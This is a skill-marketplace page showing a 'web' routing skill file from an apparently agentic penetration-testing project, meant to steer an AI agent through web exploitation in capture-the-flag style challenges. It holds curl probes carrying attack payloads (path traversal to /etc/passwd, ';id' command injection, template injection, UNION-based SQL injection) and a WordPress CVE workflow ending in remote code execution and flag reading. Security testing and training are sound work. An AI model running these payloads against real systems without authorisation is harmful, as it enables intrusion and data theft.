Run any Skill in Manus with one click

$pwd:

web

Name: Web
Author: PurpleAILAB

// Web application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.

Run Skill in Manus

$ git log --oneline --stat

stars:3,495

forks:680

updated:May 6, 2026 at 09:48

File Explorer

15 files

SKILL.md

readonly

package.json

"author": "PurpleAILAB"

"repository": "PurpleAILAB/Decepticon"

View GitHub Repository

$ install --globalskills.sh

$ download --local

Run Skill in Manus

[HINT] Download the complete skill directory including SKILL.md and all related files

Run any Skill with one click

name	web
description	Web application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.
allowed-tools	Bash Read Write
metadata	{"subdomain":"execution","when_to_use":"web exploit, web application, http, https, web vulnerability, injection, web attack, web service, api, cookie, session, authentication bypass, web shell, form, parameter, query string, POST, GET, request, response, web server, apache, nginx, flask, django, express, php, java web, asp.net, ruby on rails, spring, node.js, deserialization, SQL injection, sqlmap, SSTI, template injection, SSRF, IDOR, command injection, RCE, xss, cross-site scripting, xxe, xml, lfi, path traversal, file upload, graphql","tags":"web-application, exploitation, injection","mitre_attack":"T1190, T1059, T1203"}

Web Application Exploitation — Category Overview

This is a routing skill. It helps you identify the correct attack technique, then directs you to the specialized sub-skill with full exploitation procedures.

Attack Technique Routing

Match the target's characteristics to the right sub-skill:

Sub-Skill	Covers	When to Load	Path
sqli	Union/Error/Blind/Time-based SQL injection, sqlmap	SQL database, query parameters, login forms, search, filtering	`load_skill("/skills/exploit/web/sqli.md")`
xss	Reflected/stored/DOM XSS, bot exfiltration, CSP bypass	Client-side JS injection, bot/report URL, cookie stealing	`load_skill("/skills/exploit/web/xss.md")`
ssti	Jinja2, Twig, Freemarker, ERB, Razor template injection	Template rendering, `{{}}` or `${}` in output, Flask/Symfony/Java	`load_skill("/skills/exploit/web/ssti.md")`
ssrf	Cloud metadata, internal service access, Gopher smuggling	URL fetch parameter, redirect, internal network access	`load_skill("/skills/exploit/web/ssrf.md")`
xxe	XML entity injection, SOAP/WSDL, blind OOB	XML processing, SOAP endpoints, XML file uploads	`load_skill("/skills/exploit/web/xxe.md")`
lfi	Path traversal, PHP wrappers, log poisoning	File path parameters, `../`, include/require, file download	`load_skill("/skills/exploit/web/lfi.md")`
command-injection	OS command injection, blind/OOB, filter bypass	System commands, ping/traceroute, exec, subprocess	`load_skill("/skills/exploit/web/command-injection.md")`
deserialization	Java/PHP/.NET/Python deserialization RCE	Serialized objects, base64 blobs, ViewState, pickle	`load_skill("/skills/exploit/web/deserialization.md")`
idor	Authorization bypass, ID enumeration, privilege escalation	Object references, sequential IDs, UUIDs, access control	`load_skill("/skills/exploit/web/idor.md")`
file-upload	Webshell upload, extension/content-type bypass	File upload forms, unrestricted upload	`load_skill("/skills/exploit/web/file-upload.md")`
graphql	Introspection, SQLi via resolvers, auth bypass	GraphQL API, /graphql endpoint, GQL queries	`load_skill("/skills/exploit/web/graphql.md")`
race-condition	TOCTOU, parallel POST/GET races, session-write-before-verdict, quota/balance/coupon double-spend	bcrypt/Argon2 auth, check-then-act, slow-op widening race window, challenge tag includes race_condition/toctou/concurrent	`load_skill("/skills/exploit/web/race-condition.md")`
smuggling	HTTP request smuggling (HRS) — CL.TE/TE.CL/TE.TE, CL.0, HTTP/2 downgrade (h2.cl, h2.te, CR/LF injection), pipelining, connection-state pinning	Multi-proxy/CDN frontend, differential 4xx/5xx on duplicate or obfuscated TE/CL headers, two `Server:` strings, h2 frontend with h1 backend, challenge tag includes smuggling_desync/request_smuggling/hrs/desync	`load_skill("/skills/exploit/web/smuggling.md")`
crypto	Padding oracle (Vaudenay), AES-CBC bit-flipping, ECB block substitution, JWT alg confusion, hash-length extension	Base64 cookie/token w/ length %16 or %8, distinct invalid-pad vs auth-fail responses, JWT, repeated 16-byte ciphertext blocks, challenge tag includes `crypto`/`cipher`/`oracle`/`captcha`	`load_skill("/skills/exploit/web/crypto.md")`
cve	Known CVE exploitation — CMS plugins (WordPress/Joomla), version-specific vulnerabilities, public exploit application	Challenge tag includes `cve`, version/plugin identified in recon, known vulnerable software, challenge name/description hints at specific CVE	Inline methodology below — no separate sub-skill

Quick Detection — Which Attack Type?

Run these probes to identify which sub-skill to load:

# 1. SQL Injection — single quote error
curl -s 'https://<TARGET>/page?id=1%27' -o /dev/null -w '%{http_code}'

# 2. SSTI — math evaluation
curl -s 'https://<TARGET>/page?input={{7*7}}' | grep -o '49'

# 3. XSS — reflection check
curl -s 'https://<TARGET>/search?q=<script>test</script>' | grep '<script>test'

# 4. LFI — path traversal
curl -s 'https://<TARGET>/file?name=../../../etc/passwd' | grep 'root:'

# 5. Command Injection — command chaining
curl -s 'https://<TARGET>/ping?host=127.0.0.1;id' | grep 'uid='

# 6. SSRF — localhost access
curl -s 'https://<TARGET>/fetch?url=http://127.0.0.1/' -o ssrf_test.txt

# 7. XXE — XML acceptance
curl -s 'https://<TARGET>/api' -H 'Content-Type: application/xml' -d '<?xml version="1.0"?><test>hello</test>'

# 8. GraphQL — endpoint discovery
curl -s 'https://<TARGET>/graphql' -H 'Content-Type: application/json' -d '{"query":"{ __typename }"}'

Decision Flow

Web target identified?
├── Has query parameters → Try sqli.md, then ssti.md
├── Has file/path parameters → Try lfi.md
├── Has URL/fetch parameters → Try ssrf.md
├── Has search/input reflection → Try xss.md
├── Has file upload form → Try file-upload.md
├── Accepts XML input → Try xxe.md
├── Has /graphql endpoint → Try graphql.md
├── Has ping/exec functionality → Try command-injection.md
├── Has serialized data (cookies, POST) → Try deserialization.md
├── Has object IDs in URLs → Try idor.md
├── Tag/hint includes race/concurrent/toctou → Try race-condition.md
├── Tag/hint includes smuggling/desync/hrs OR multi-proxy stack detected → Try smuggling.md
├── Tag/hint includes crypto/cipher/oracle/captcha OR base64 cookie %16==0 with distinct pad-vs-auth errors → Try crypto.md
├── Tag includes cve OR challenge description mentions a specific CVE/plugin vulnerability → Use CVE methodology below
└── Unknown → Run quick detection probes above

CVE / Known-Exploit Methodology

For challenges tagged cve or involving known vulnerabilities in specific software versions:

# Step 1: Fingerprint the CMS, framework, and plugin versions
curl -s https://<TARGET>/ | grep -i 'wp-content\|generator\|powered by\|version'
curl -s https://<TARGET>/wp-login.php -o cms_login.txt          # WordPress
curl -s https://<TARGET>/administrator/ -o cms_admin.txt        # Joomla

# WordPress plugin enumeration
wpscan --url https://<TARGET>/ --enumerate p,t,u --no-banner -o wpscan_out.txt 2>&1
# OR manual:
curl -s 'https://<TARGET>/wp-content/plugins/' -o wp_plugins.txt
for plugin in contact-form-7 woocommerce elementor yoast-seo; do
    curl -s -o /dev/null -w "$plugin: %{http_code}\n" \
      "https://<TARGET>/wp-content/plugins/${plugin}/readme.txt"
done

# Step 2: Identify the CVE from fingerprinted version + challenge hints
# - Check challenge name/description for CVE ID or plugin name
# - Cross-reference plugin version from readme.txt with known CVEs
curl -s "https://<TARGET>/wp-content/plugins/<PLUGIN>/readme.txt" | grep -i 'version\|stable tag'

# Step 3: Apply exploit based on CVE class
# SQLi CVE — use sqli.md techniques against the vulnerable endpoint
# LFI CVE — use lfi.md techniques (path traversal, PHP wrappers)
# RCE CVE — craft payload for the specific vulnerable parameter/endpoint
# Auth bypass CVE — manipulate the authentication endpoint directly

# Common WordPress exploit patterns:
# Unauthenticated RCE via plugin upload endpoint
curl -s -X POST 'https://<TARGET>/wp-admin/admin-ajax.php' \
  -d 'action=<VULNERABLE_ACTION>&<PARAM>=<PAYLOAD>' -o cve_rce.txt

# SQLi via vulnerable plugin parameter
curl -s "https://<TARGET>/wp-admin/admin-ajax.php?action=<ACTION>&id=1 UNION SELECT 1,flag,3--+" \
  -o cve_sqli.txt

# Step 4: Read the flag
curl -s 'https://<TARGET>/flag.txt' -o flag.txt
curl -s 'https://<TARGET>/FLAG.txt' -o flag2.txt
# Or via RCE: execute `cat /flag.txt` through the exploit

Key rule: Once you identify the CVE class (SQLi/LFI/RCE/auth bypass), load the corresponding sub-skill (sqli.md, lfi.md, etc.) for detailed bypass techniques.

Sub-Skill Loading Rule

ALWAYS load the specialized sub-skill before executing any attack. This overview provides routing only — the sub-skills contain the actual exploitation procedures, tool commands, bypass techniques, and decision trees needed for successful exploitation.

For the agent loop (intake handoff verification, confirm-gate phase, verification, silent-stall recovery, three-strike rule) see the root workflow at load_skill("/skills/exploit/workflow.md").

name	web
description	Web application exploitation — the primary category skill for all web-based attacks. This is a routing skill: read this first to identify the attack type, then load the appropriate specialized sub-skill for detailed procedures. Covers 11 technique areas across injection, file access, authentication, and API exploitation.
allowed-tools	Bash Read Write
metadata	{"subdomain":"execution","when_to_use":"web exploit, web application, http, https, web vulnerability, injection, web attack, web service, api, cookie, session, authentication bypass, web shell, form, parameter, query string, POST, GET, request, response, web server, apache, nginx, flask, django, express, php, java web, asp.net, ruby on rails, spring, node.js, deserialization, SQL injection, sqlmap, SSTI, template injection, SSRF, IDOR, command injection, RCE, xss, cross-site scripting, xxe, xml, lfi, path traversal, file upload, graphql","tags":"web-application, exploitation, injection","mitre_attack":"T1190, T1059, T1203"}